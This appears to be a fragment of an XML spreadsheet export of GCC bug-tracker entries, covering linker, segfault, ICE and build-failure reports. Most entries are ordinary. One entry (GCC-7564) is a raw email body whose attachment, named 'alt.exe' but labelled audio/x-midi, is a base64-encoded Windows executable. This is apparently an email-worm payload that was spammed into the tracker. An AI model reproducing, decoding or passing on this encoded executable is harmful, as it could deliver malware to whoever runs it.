    <t>../bfd/.libs/libbfd.a(plugin.o): undefined reference to symbol 'dlsym@@GLIBC_2.16'</t>
  </si>
  <si>
    <t>config/plugins.m4 is shared with binutils. It has
 if test $plugins = yes then
    AC_SEARCH_LIBS([dlopen] [dl])
  fi
plugins use dlsym but libasan.so only intercepts dlopen not dlsym:
[hjl@gnu-tools-1 binutils-x32-text]$ nm -D /lib64/libasan.so.4| grep  dl
0000000000038580 W dlclose
                 U dl_iterate_phdr
000000000004dc50 W dlopen
                 U dlsym
                 U dlvsym
[hjl@gnu-tools-1 binutils-x32-text]$ 
Testing dlopen for libdl leads to false negative when -fsanitize=address
is used.</t>
  </si>
  <si>
    <t>GCC-26980</t>
  </si>
  <si>
    <t>g++.old-deja/g++.other/init5.C execution test fails</t>
  </si>
  <si>
    <t>The XFAIL has been removed from g++.old-deja/g++.other/init5.C but we still have
FAIL: g++.old-deja/g++.other/init5.C execution test
on platforms including hppa2.0w-hp-hpux11.11 hppa64-hp-hpux11.11 and ia64-hp-hpux11.23.</t>
  </si>
  <si>
    <t>GCC-11214</t>
  </si>
  <si>
    <t>gcc dbdimp in DBD::Pg give seg fault under cygwin 1.3</t>
  </si>
  <si>
    <t>gcc compile of dbdimp as part of DBD::Pg generates a seg fault.  Output of 
gcc -v perl -V are below and dbdimp.i is available but I don't see how to 
attach dbdimp.i here.  
My apologies if there is not enough information or if I should have resorted 
to some other list please let me know if true.  
The system is cygwin 1.3 running with W-XP home w/ service pack 1.  All 
cygwin components were installed with the cygwin setup program and up to date 
as of 6/15/03.
gcc -v first then perl -V
Reading specs from /usr/lib/gcc-lib/i686-pc-cygwin/3.2/specs
Configured with: /netrel/src/gcc-3.2-3/configure --enable-
languages=cc++f77java --enable-libgcj --enable-threads=posix --with-system-
zlib --enable-nls --without-included-gettext --enable-interpreter --disable-
sjlj-exceptions --disable-version-specific-runtime-libs --enable-shared --
build=i686-pc-linux --host=i686-pc-cygwin --target=i686-pc-cygwin --enable-
haifa --prefix=/usr --exec-prefix=/usr --sysconfdir=/etc --libdir=/usr/lib --
includedir=/nonexistent/include --libexecdir=/usr/sbin
Thread model: posix
gcc version 3.2 20020927 (prerelease)
gcc -c  -I/usr/include -I/usr/lib/perl5/site_perl/5.8.0/cygwin-multi-
64int/auto/DBI -DPERL_USE_SAFE_PUTENV -fno-strict-aliasing -DUSEIMPORTLIB -
O3   -DVERSION=\1.22\ -DXS_VERSION=\1.22\  -I/usr/lib/perl5/5.8.0/cygwin-
multi-64int/CORE   dbdimp.c
cc1: warning: changing search order for system directory /usr/include
cc1: warning:   as it has already been specified as a non-system directory
dbdimp.c: In function `dbd_bind_ph':
dbdimp.c:1156: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [dbdimp.o] Error 1
Summary of my perl5 (revision 5.0 version 8 subversion 0) configuration:
  Platform:
    osname=cygwin osvers=1.3.22(0.7832) archname=cygwin-multi-64int
    uname='cygwin_nt-4.0 iokaste 1.3.22(0.7832) 2003-03-18 09:20 i686 unknown 
unknown cygwin '
    config_args='-de -Dmksymlinks -Dusemultiplicity -Duse64bitint -Doptimize=-
O3 -Dman3ext=3pm'
    hint=recommended useposix=true d_sigaction=define
    usethreads=undef use5005threads=undef useithreads=undef 
usemultiplicity=define
    useperlio=define d_sfio=undef uselargefiles=define usesocks=undef
    use64bitint=define use64bitall=undef uselongdouble=undef
    usemymalloc=y bincompat5005=undef
  Compiler:
    cc='gcc' ccflags ='-DPERL_USE_SAFE_PUTENV -fno-strict-aliasing'
    optimize='-O3'
    cppflags='-DPERL_USE_SAFE_PUTENV -fno-strict-aliasing'
    ccversion='' gccversion='3.2.3 (home grown)' gccosandvers=''
    intsize=4 longsize=4 ptrsize=4 doublesize=8 byteorder=12345678
    d_longlong=define longlongsize=8 d_longdbl=define longdblsize=12
    ivtype='long long' ivsize=8 nvtype='double' nvsize=8 Off_t='off_t' 
lseeksize=4
    alignbytes=8 prototype=define
  Linker and Libraries:
    ld='ld2' ldflags =' -s -L/usr/local/lib'
    libpth=/usr/local/lib /usr/lib /lib
    libs=-lgdbm -ldb -lcrypt -lutil -lgdbm_compat
    perllibs=-lcrypt -lutil -lgdbm_compat
    libc=/usr/lib/libc.a so=dll useshrplib=true libperl=libperl.a
    gnulibc_version=''
  Dynamic Linking:
    dlsrc=dl_dlopen.xs dlext=dll d_dlsymun=undef ccdlflags=' -s'
    cccdlflags=' ' lddlflags=' -s -L/usr/local/lib'
Characteristics of this binary (from libperl): 
  Compile-time options: MULTIPLICITY USE_64_BIT_INT USE_LARGE_FILES 
PERL_IMPLICIT_CONTEXT
  Built under cygwin
  Compiled at Jun  2 2003 13:55:45
  %ENV:
    CYGWIN=tty notitle glob
  @INC:
    /usr/lib/perl5/5.8.0/cygwin-multi-64int
    /usr/lib/perl5/5.8.0
    /usr/lib/perl5/site_perl/5.8.0/cygwin-multi-64int
    /usr/lib/perl5/site_perl/5.8.0
    /usr/lib/perl5/site_perl
    .</t>
  </si>
  <si>
    <t>dominic.ryan</t>
  </si>
  <si>
    <t>GCC-17631</t>
  </si>
  <si>
    <t>libfortran: intrinsic subroutine MVBITS not implemented</t>
  </si>
  <si>
    <t>Hi
MVBITS appears to not to be implemented.
program gfcbug13
  implicit none
  integer :: to
  to = 0
  call mvbits (from=1 frompos=0 len=1 to=to topos=1)
  if (to /= 2) then
     print * Error TO = to
  end if
end program gfcbug13
The example fails to link with error message:
gfcbug13.f90: undefined reference to `__gfortran_mvbits'
collect2: ld returned 1 exit status
Cheers
-ha</t>
  </si>
  <si>
    <t>GCC-55511</t>
  </si>
  <si>
    <t>[4.8 Regression] r193802 caused s390x bootstrap failure</t>
  </si>
  <si>
    <t>Created attachment 28817
Reduced testcase
cc1 t.c -quiet -g -O1
t.c: In function â€˜__parityti2â€™:
t.c:23:1: internal compiler error: in vt_expand_var_loc_chain at var-tracking.c:8020
 }
 ^
0x80baa299 vt_expand_var_loc_chain
	/build/gcc-head/gcc/var-tracking.c:8020
0x80baafa5 vt_expand_loc_callback
	/build/gcc-head/gcc/var-tracking.c:8216
0x803166e9 cselib_expand_value_rtx_1
	/build/gcc-head/gcc/cselib.c:1683
0x803168ad cselib_expand_value_rtx_1
	/build/gcc-head/gcc/cselib.c:1721
0x803160f9 cselib_expand_value_rtx_cb(rtx_def* bitmap_head_def* int rtx_def* (*)(rtx_def* bitmap_head_def* int void*) void*)
	/build/gcc-head/gcc/cselib.c:1530
0x80baa41b vt_expand_var_loc_chain
	/build/gcc-head/gcc/var-tracking.c:8054
0x80baafa5 vt_expand_loc_callback
	/build/gcc-head/gcc/var-tracking.c:8216
0x803166e9 cselib_expand_value_rtx_1
	/build/gcc-head/gcc/cselib.c:1683
0x803168ad cselib_expand_value_rtx_1
	/build/gcc-head/gcc/cselib.c:1721
0x803160f9 cselib_expand_value_rtx_cb(rtx_def* bitmap_head_def* int rtx_def* (*)(rtx_def* bitmap_head_def* int void*) void*)
	/build/gcc-head/gcc/cselib.c:1530
0x80baa41b vt_expand_var_loc_chain
	/build/gcc-head/gcc/var-tracking.c:8054
0x80baafa5 vt_expand_loc_callback
	/build/gcc-head/gcc/var-tracking.c:8216
0x803166e9 cselib_expand_value_rtx_1
	/build/gcc-head/gcc/cselib.c:1683
0x803160f9 cselib_expand_value_rtx_cb(rtx_def* bitmap_head_def* int rtx_def* (*)(rtx_def* bitmap_head_def* int void*) void*)
	/build/gcc-head/gcc/cselib.c:1530
0x80baa41b vt_expand_var_loc_chain
	/build/gcc-head/gcc/var-tracking.c:8054
0x80bab6fd vt_expand_1pvar
	/build/gcc-head/gcc/var-tracking.c:8331
0x80baba47 emit_note_insn_var_location
	/build/gcc-head/gcc/var-tracking.c:8385
0x80f288a3 htab_traverse_noresize
	/build/gcc-head/libiberty/hashtab.c:784
0x80f2897f htab_traverse
	/build/gcc-head/libiberty/hashtab.c:800
0x80bad69b emit_notes_for_changes
	/build/gcc-head/gcc/var-tracking.c:8749
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-70</t>
  </si>
  <si>
    <t>[parser] template operator friend</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Thu 10 Feb 2000 11:25:05 -0500
 Original-Message-ID: 
 The preprocessed code below generates the following compiler error:
 foo.C: In instantiation of `foo':
 foo.C:45:   instantiated from here
 foo.C:16: invalid use of undefined type `class foo'
 foo.C:23: forward declaration of `class foo'
 Here are the vitals:
 g++ -v
 Reading specs from /usr/local/lib/gcc-lib/mips-sgi-irix6.5/2.95.2/specs
 gcc version 2.95.2 19991024 (release)
 uname
 IRIX mozart 6.5 10181059 IP32 mips
 BUG DESCRIPTION:
    This is an example program written to demonstrate the bug.  The problem
 occurs when operator*() is declared as both a friend and member.  No
 problem occurs when operator*() is declared only as a friend or only as a
 member. Comment out the member definition and declaration of operator*()
 and everything works.
 Thanks for any help.
 JM
 P.S. please cc me. I'm not on the list.
Release:
2.95.2
How-To-Repeat:
template 
class foo
template 
foo operator*( const EType 
template 
class foo {
  public:
     foo( const EType v = 0 ) : Value( v ) {}
     virtual ~foo( ) {}
     friend foo operator*  ( const EType 
     foo operator*( const EType 
  private:
     EType Value
}
// Friend Function operator* definition
template 
foo operator*( const EType &amp; e const foo &amp; f )
{
   return foo( e * f.Value )
}
// Member Function operator * definition
template 
foo foo::operator*( const EType &amp; e )
{
   return foo( e * Value )
}
int main( )
{
   foo f( 5.0 )
   return 0
}</t>
  </si>
  <si>
    <t>GCC-18951</t>
  </si>
  <si>
    <t>Invalid code generated by expand_errno_check</t>
  </si>
  <si>
    <t>extern double sqrt (double __x) throw ()
namespace ns
{
  using ::sqrt
  template
    class C
    {
    public:
      C(const _Tp
      const _Tp
      const _Tp
    private:
      _Tp _M_r
      _Tp _M_i
    }
  template inline const _Tp }
  template inline const _Tp }
  template inline C::C(const _Tp&amp; __r const _Tp&amp; __i)
    : _M_r(__r) _M_i(__i) { }
  template _Tp foo(const C
  template _Tp bar(const C
  template inline _Tp bar(const C&amp; __z)
    {
      _Tp __x = __z.r()
      _Tp __y = __z.i()
      const _Tp __s = __builtin_fabs(__x)
      __x /= __s __y /= __s
      return __s * sqrt(__x * __x + __y * __y)
    }
  template _Tp foo(const C&amp; __z)
    {
      _Tp __x = __z.r()
      _Tp __t = sqrt(ns::bar(__z))
      return __t
    }
}
ns::C z1(1.0/0.0 0.0)
double z2
int main()
{
  z2 = ns::foo(z1)
  return 0
}
at -O1 -O2 or -O3 is compiled into an endless loop.
The bug seems to be that expand_errno_check expands arguments once again and they
haven't been save_expr'ed.</t>
  </si>
  <si>
    <t>GCC-23788</t>
  </si>
  <si>
    <t>s-taprop.adb:69:06: warning: cannot depend on Interrupt_Operations (wrong categorization)</t>
  </si>
  <si>
    <t>../../xgcc -B../../  -c -g -O2 -mdisable-indexing     -W -Wall -gnatpg  s-taprop
.adb -o s-taprop.o
s-taprop.adb:69:06: warning: cannot depend on Interrupt_Operations (wrong cate
gorization)
s-taprop.adb:69:06: warning: preelaborated unit cannot depend on non-preelaborat
ed unit
make[5]: *** [s-taprop.o] Error 1
make[5]: Leaving directory `/xxx/gnu/gcc-3.3/objdir/gcc/ada/rts'
make[4]: *** [gnatlib] Error 2
make[4]: Leaving directory `/xxx/gnu/gcc-3.3/objdir/gcc/ada'
make[3]: *** [gnatlib-shared] Error 2
make[3]: Leaving directory `/xxx/gnu/gcc-3.3/objdir/gcc/ada'
make[2]: *** [gnatlib-shared] Error 2
make[2]: Leaving directory `/xxx/gnu/gcc-3.3/objdir/hppa1.1-hp-hpux10.20/libada'
make[1]: *** [all-target-libada] Error 2
make[1]: Leaving directory `/xxx/gnu/gcc-3.3/objdir'
make: *** [bootstrap] Error 2
Thu Sep  8 11:21:47 EDT 2005</t>
  </si>
  <si>
    <t>GCC-72743</t>
  </si>
  <si>
    <t>ICE in get_constraint_for_ssa_var at tree-ssa-structalias.c:2958</t>
  </si>
  <si>
    <t>Not with -O1 but with optimization level -Os -O2 or higher.
Seen with 6 an 7.
$ cat z1.f90
program p
   integer parameter :: n = 8
   integer :: i z(n)
   z = [(i i=1n)]
   print * z
end
subroutine s
   integer parameter :: n = 8
   integer :: i z(n)
   z = [(i i=1n)]
   print * z
end
$ gfortran-7-20160724 -O2 -fopenacc z1.f90
z1.f90:12:0:
 end
internal compiler error: in get_constraint_for_ssa_var at tree-ssa-structalias.c:2958
0xde8325 get_constraint_for_ssa_var
        ../../gcc/tree-ssa-structalias.c:2955
0xde8456 get_constraint_for_1
        ../../gcc/tree-ssa-structalias.c:3544
0xde8d72 get_constraint_for_address_of
        ../../gcc/tree-ssa-structalias.c:3367
0xde86aa get_constraint_for_1
        ../../gcc/tree-ssa-structalias.c:3435
0xde93ed get_constraint_for_ptr_offset
        ../../gcc/tree-ssa-structalias.c:3099
0xde84f6 get_constraint_for_1
        ../../gcc/tree-ssa-structalias.c:3450
0xdeb4c9 do_structure_copy
        ../../gcc/tree-ssa-structalias.c:3627
0xdeb4c9 find_func_aliases
        ../../gcc/tree-ssa-structalias.c:4771
0xdf2fb6 ipa_pta_execute
        ../../gcc/tree-ssa-structalias.c:7808</t>
  </si>
  <si>
    <t>chunglin.tang</t>
  </si>
  <si>
    <t>GCC-10102</t>
  </si>
  <si>
    <t>preprocessor runs out of stack space ..internal segment error in gcc</t>
  </si>
  <si>
    <t>the test program test1.c bombs with a segmentation error most of the time.
Also after making absolutely no changes to the source or the make files msp430-gcc will avoid the segmnetation error and begin to flag the #ifend type directives after processing them siccessfully a good way into the tree as if it ran out of stack space or something.
msp430-gcc.exe test1.c -mmcu=msp430x1121 -o test1
Same is true in Win ME 
latest build 030306
Release:
msp-gcc 030306
Environment:
Windows 98 SE    gcc msp430</t>
  </si>
  <si>
    <t>dougk71</t>
  </si>
  <si>
    <t>GCC-7564</t>
  </si>
  <si>
    <t xml:space="preserve"> --U6iNQ0dOFY97Q
 Content-Type: text/html
 Content-Transfer-Encoding: quoted-printable
 --U6iNQ0dOFY97Q
 Content-Type: audio/x-midi
 	name=alt.exe
 Content-Transfer-Encoding: base64
 Content-ID: 
 TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
 RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn
 GbNm+BOzPucAs1X4E7Nc+BKzJfgTs7TnGLNO+BOz5P4Vs134E7NSaWNoXPgTswAAAAAAAAAA
 UEUAAEwBBAC4jrc8AAAAAAAAAADgAA8BCwEGAADAAAAAkAgAAAAAAFiEAAAAEAAAANAAAAAA
 QAAAEAAAABAAAAQAAAAAAAAABAAAAAAAAAAAYAkAABAAAAAAAAACAAAAAAAQAAAQAAAAABAA
 ABAAAAAAAAAQAAAAAAAAAAAAAAAg1gAAZAAAAABQCQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 ANAAAOwBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAEq6AAAAEAAAAMAAAAAQ
 AAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAAiEAAAANAAAAAgAAAA0AAAAAAAAAAAAAAAAAAA
 QAAAQC5kYXRhAAAAbF4IAADwAAAAUAAAAPAAAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAABAA
 AAAAUAkAEAAAAABAAQAAAAAAAAAAAAAAAABAAAB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FWL7IPsFItF
 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
